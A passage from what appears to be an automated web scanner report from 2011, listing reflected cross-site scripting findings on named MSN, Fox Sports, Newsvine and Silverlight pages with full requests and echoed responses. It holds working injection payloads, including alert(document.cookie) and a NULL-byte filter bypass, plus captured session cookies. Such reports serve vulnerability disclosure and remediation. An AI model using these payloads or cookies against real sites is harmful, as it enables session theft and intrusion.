A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 200 OK
ntCoent-Length: 12733
Content-Type: application/x-javascript
ETag: 7f87e1784ee58de46a57500030b11c25
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Cache-Control: public, max-age=43200
Expires: Mon, 31 Jan 2011 02:59:00 GMT
Date: Sun, 30 Jan 2011 14:59:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12733


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
on(){new epx_searchBox({"allowEmptySearch":true,"appId":"1000","boxId":"searchBox","btnId":"submitSearch","focusOnInit":true,"maxTerms":null,"minimumTermLength":3,"paramsCallback":null,"queryParams":"&c8a70<img src=a onerror=alert(1)>1469ac780f8=1","scopeId":"1","searchLocation":"\/site\/search","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search all projects"}} ).init();});},
function
...[SNIP]...

5.195. http://ingame.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46847"><script>alert(1)</script>138d2fa70ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46847"><script>alert(1)</script>138d2fa70ec=1 HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:08:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124933


<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?46847"><script>alert(1)</script>138d2fa70ec=1&nvo=0&30117931|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.196. http://investing.money.redacted/investments/charts [Symbol parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/charts

Issue detail

The value of the Symbol request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b72"%3balert(1)//2badde9cef5 was submitted in the Symbol parameter. This input was echoed as 22b72";alert(1)//2badde9cef5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /investments/charts?Symbol=indu22b72"%3balert(1)//2badde9cef5 HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:35 GMT
Content-Length: 49749
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
erUrl=\"http://moneycentral.redacted/inc/admin/general/ImageToPngConverter.ashx?URL={0}\" \
DLChartUrl=\"http://redacted/investor/charts/chartdl.aspx?symbol=indu22b72";alert(1)//2badde9cef5\" \
StartTicker=\"$INDU\" \
/>
...[SNIP]...

5.197. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 56c3d<script>alert(1)</script>22dd092b040 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=A0654656c3d<script>alert(1)</script>22dd092b040 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 30 Jan 2011 01:45:52 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 31 Jan 2011 01:45:52 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 01:45:52 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A0654656C3D<SCRIPT>ALERT(1)</SCRIPT>22DD092B040" was not recognized.
*/

5.198. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The value of the returnurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 was submitted in the returnurl parameter. This input was echoed as 981cd"style="x:expression(alert(1))"27f64f44305 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13452
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=f4wmfx55nhab5r55g0gog145; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<a href="https://login.silverlight.net/login/signin.aspx?returnurl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305">
...[SNIP]...

5.199. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The value of the returnurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7547a"style%3d"x%3aexpression(alert(1))"d77e1fb43b1f1de96 was submitted in the returnurl parameter. This input was echoed as 7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx7547a"style%3d"x%3aexpression(alert(1))"d77e1fb43b1f1de96&__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMiddle%24loginForm%24Button2=Sign+In HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:36:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:19 GMT
Content-Length: 15704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="https://login.silverlight.net/login/signin.aspx?returnurl=http://www.silverlight.net/showcase/default.aspx7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96">
...[SNIP]...

5.200. http://michaelwann.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://michaelwann.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96b9"-alert(1)-"5a6f605e0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d96b9"-alert(1)-"5a6f605e0b4=1 HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6d2f3fb611f44e2c7adec971945fc305; expires=Sat, 25-Jan-2031 17:55:56 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1411125","http://michaelwann.newsvine.com/?d96b9"-alert(1)-"5a6f605e0b4=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.201. http://redacted/investor/charts/chartdl.aspx [symbol parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The value of the symbol request parameter is copied into the name of an HTML tag attribute. The payload 5173f%20style%3dx%3aexpression(alert(1))%20871257c1879 was submitted in the symbol parameter. This input was echoed as 5173f style=x:expression(alert(1)) 871257c1879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef55173f%20style%3dx%3aexpression(alert(1))%20871257c1879 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 19:53:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 25085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<input id="symbol" value="INDU22B72";ALERT(DOCUMENT.COOKIE)//2BADDE9CEF55173F STYLE=X:EXPRESSION(ALERT(1)) 871257C1879" class="textctrl" maxlength="100" size="15" name="symbol" onfocus="if(this.value=='Name or symbol(s)')this.value=''" onblur="if('Name or symbol(s)'.length >
...[SNIP]...

5.202. http://redacted/investor/charts/chartdl.aspx [symbol parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The value of the symbol request parameter is copied into the name of an HTML tag attribute. The payload 14e81%20style%3dx%3aexpression(alert(1))%209197df0cd41 was submitted in the symbol parameter. This input was echoed as 14e81 style=x:expression(alert(1)) 9197df0cd41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef514e81%20style%3dx%3aexpression(alert(1))%209197df0cd41 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:08:48 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 25001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<input id="symbol" value="INDU22B72";ALERT(1)//2BADDE9CEF514E81 STYLE=X:EXPRESSION(ALERT(1)) 9197DF0CD41" class="textctrl" maxlength="100" size="15" name="symbol" onfocus="if(this.value=='Name or symbol(s)')this.value=''" onblur="if('Name or symbol(s)'.length >
...[SNIP]...

5.203. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c9c'-alert(1)-'b3d666f6c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175?f9c9c'-alert(1)-'b3d666f6c9a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248865
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 29 Jan 2011 23:50:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/collegebasketball/story/Baylor-70-Colorado-66-30467175?f9c9c'-alert(1)-'b3d666f6c9a=1';

       startComments('StoryComments', '26409015'); // load up team comments
   </script>
...[SNIP]...

5.204. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5cb'-alert(1)-'e2af03ab728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420?fc5cb'-alert(1)-'e2af03ab728=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234575
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 29 Jan 2011 23:50:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420?fc5cb'-alert(1)-'e2af03ab728=1';

       startComments('StoryComments', '26394224'); // load up team comments
   </script>
...[SNIP]...

5.205. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c732'-alert(1)-'3b16cbe3f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911?4c732'-alert(1)-'3b16cbe3f75=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 237708
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=30
Date: Sat, 29 Jan 2011 23:49:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911?4c732'-alert(1)-'3b16cbe3f75=1';

       startComments('StoryComments', '26401001'); // load up team comments
   </script>
...[SNIP]...

5.206. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba1f5'-alert(1)-'3ac5f96b8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

